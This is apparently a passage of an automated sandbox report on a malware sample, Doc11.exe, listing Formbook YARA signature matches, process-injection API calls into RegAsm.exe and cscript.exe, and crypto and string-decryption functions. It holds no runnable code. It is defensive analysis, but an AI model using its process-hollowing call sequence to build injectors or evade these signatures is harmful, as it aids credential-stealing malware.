Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_05001C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread, 0_2_05001C09
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_050000AD NtOpenSection,NtMapViewOfSection, 0_2_050000AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419CA0 NtCreateFile, 2_2_00419CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419D50 NtReadFile, 2_2_00419D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419DD0 NtClose, 2_2_00419DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419E80 NtAllocateVirtualMemory, 2_2_00419E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419C9A NtCreateFile, 2_2_00419C9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419D4A NtReadFile, 2_2_00419D4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419DCC NtClose, 2_2_00419DCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419E7A NtAllocateVirtualMemory, 2_2_00419E7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03169A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A20 NtResumeThread,LdrInitializeThunk, 2_2_03169A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A50 NtCreateFile,LdrInitializeThunk, 2_2_03169A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_03169910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031699A0 NtCreateSection,LdrInitializeThunk, 2_2_031699A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169840 NtDelayExecution,LdrInitializeThunk, 2_2_03169840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03169860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031698F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_031698F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169710 NtQueryInformationToken,LdrInitializeThunk, 2_2_03169710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169780 NtMapViewOfSection,LdrInitializeThunk, 2_2_03169780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031697A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_031697A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_03169660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031696E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_031696E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169540 NtReadFile,LdrInitializeThunk, 2_2_03169540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031695D0 NtClose,LdrInitializeThunk, 2_2_031695D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169B00 NtSetValueKey, 2_2_03169B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A3B0 NtGetContextThread, 2_2_0316A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A10 NtQuerySection, 2_2_03169A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A80 NtOpenDirectoryObject, 2_2_03169A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169950 NtQueueApcThread, 2_2_03169950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031699D0 NtCreateProcessEx, 2_2_031699D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169820 NtEnumerateKey, 2_2_03169820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316B040 NtSuspendThread, 2_2_0316B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031698A0 NtWriteVirtualMemory, 2_2_031698A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A710 NtOpenProcessToken, 2_2_0316A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169730 NtQueryVirtualMemory, 2_2_03169730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169770 NtSetInformationFile, 2_2_03169770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A770 NtOpenThread, 2_2_0316A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169760 NtOpenProcess, 2_2_03169760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169FE0 NtCreateMutant, 2_2_03169FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169610 NtEnumerateValueKey, 2_2_03169610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169650 NtQueryValueKey, 2_2_03169650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169670 NtQueryInformationProcess, 2_2_03169670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031696D0 NtCreateKey, 2_2_031696D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316AD30 NtSetContextThread, 2_2_0316AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169520 NtWaitForSingleObject, 2_2_03169520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169560 NtWriteFile, 2_2_03169560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031695F0 NtQueryInformationFile, 2_2_031695F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C295D0 NtClose,LdrInitializeThunk, 6_2_04C295D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29540 NtReadFile,LdrInitializeThunk, 6_2_04C29540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29560 NtWriteFile,LdrInitializeThunk, 6_2_04C29560
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C296D0 NtCreateKey,LdrInitializeThunk, 6_2_04C296D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C296E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_04C296E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29650 NtQueryValueKey,LdrInitializeThunk, 6_2_04C29650
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_04C29660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29610 NtEnumerateValueKey,LdrInitializeThunk, 6_2_04C29610
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29FE0 NtCreateMutant,LdrInitializeThunk, 6_2_04C29FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29780 NtMapViewOfSection,LdrInitializeThunk, 6_2_04C29780
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29770 NtSetInformationFile,LdrInitializeThunk, 6_2_04C29770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29710 NtQueryInformationToken,LdrInitializeThunk, 6_2_04C29710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29840 NtDelayExecution,LdrInitializeThunk, 6_2_04C29840
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_04C29860
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C299A0 NtCreateSection,LdrInitializeThunk, 6_2_04C299A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_04C29910
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A50 NtCreateFile,LdrInitializeThunk, 6_2_04C29A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29B00 NtSetValueKey,LdrInitializeThunk, 6_2_04C29B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C295F0 NtQueryInformationFile, 6_2_04C295F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29520 NtWaitForSingleObject, 6_2_04C29520
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2AD30 NtSetContextThread, 6_2_04C2AD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29670 NtQueryInformationProcess, 6_2_04C29670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C297A0 NtUnmapViewOfSection, 6_2_04C297A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29760 NtOpenProcess, 6_2_04C29760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A770 NtOpenThread, 6_2_04C2A770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A710 NtOpenProcessToken, 6_2_04C2A710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29730 NtQueryVirtualMemory, 6_2_04C29730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C298F0 NtReadVirtualMemory, 6_2_04C298F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C298A0 NtWriteVirtualMemory, 6_2_04C298A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2B040 NtSuspendThread, 6_2_04C2B040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29820 NtEnumerateKey, 6_2_04C29820
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C299D0 NtCreateProcessEx, 6_2_04C299D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29950 NtQueueApcThread, 6_2_04C29950
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A80 NtOpenDirectoryObject, 6_2_04C29A80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A00 NtProtectVirtualMemory, 6_2_04C29A00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A10 NtQuerySection, 6_2_04C29A10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A20 NtResumeThread, 6_2_04C29A20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A3B0 NtGetContextThread, 6_2_04C2A3B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19CA0 NtCreateFile, 6_2_00B19CA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19DD0 NtClose, 6_2_00B19DD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19D50 NtReadFile, 6_2_00B19D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19E80 NtAllocateVirtualMemory, 6_2_00B19E80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19C9A NtCreateFile, 6_2_00B19C9A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19DCC NtClose, 6_2_00B19DCC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19D4A NtReadFile, 6_2_00B19D4A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19E7A NtAllocateVirtualMemory, 6_2_00B19E7A
Detected potential crypto function
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D4A58 0_2_009D4A58
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D5B80 0_2_009D5B80
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D4A48 0_2_009D4A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E98F 2_2_0041E98F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041DA6C 2_2_0041DA6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E539 2_2_0041E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409E1B 2_2_00409E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409E20 2_2_00409E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041DFA4 2_2_0041DFA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2B28 2_2_031F2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315EBB0 2_2_0315EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E03DA 2_2_031E03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EDBD2 2_2_031EDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DFA2B 2_2_031DFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F22AE 2_2_031F22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312F900 2_2_0312F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03144120 2_2_03144120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1002 2_2_031E1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031FE824 2_2_031FE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313B090 2_2_0313B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031520A0 2_2_031520A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F20A8 2_2_031F20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F28EC 2_2_031F28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031FDFCE 2_2_031FDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F1FF1 2_2_031F1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031ED616 2_2_031ED616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03146E30 2_2_03146E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2EF7 2_2_031F2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2D07 2_2_031F2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03120D20 2_2_03120D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F1D55 2_2_031F1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 2_2_03152581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F25DD 2_2_031F25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313D5E0 2_2_0313D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313841F 2_2_0313841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031ED466 2_2_031ED466
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF841F 6_2_04BF841F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAD466 6_2_04CAD466
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB25DD 6_2_04CB25DD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 6_2_04BFD5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE0D20 6_2_04BE0D20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB1D55 6_2_04CB1D55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2D07 6_2_04CB2D07
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2EF7 6_2_04CB2EF7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAD616 6_2_04CAD616
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C06E30 6_2_04C06E30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CBDFCE 6_2_04CBDFCE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB1FF1 6_2_04CB1FF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB28EC 6_2_04CB28EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB090 6_2_04BFB090
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB20A8 6_2_04CB20A8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1002 6_2_04CA1002
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CBE824 6_2_04CBE824
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEF900 6_2_04BEF900
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 6_2_04C04120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB22AE 6_2_04CB22AE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FA2B 6_2_04C9FA2B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA03DA 6_2_04CA03DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CADBD2 6_2_04CADBD2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1EBB0 6_2_04C1EBB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2B28 6_2_04CB2B28
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B02D90 6_2_00B02D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B09E20 6_2_00B09E20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B09E1B 6_2_00B09E1B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B02FB0 6_2_00B02FB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DFA4 6_2_00B1DFA4
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0312B150 appears 45 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04BEB150 appears 45 times
Sample file is different than original file name gathered from version info
Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePGzTmRHSQnoDrXlf.bounce.exe4 vs Doc11.exe
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Yara signature match
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
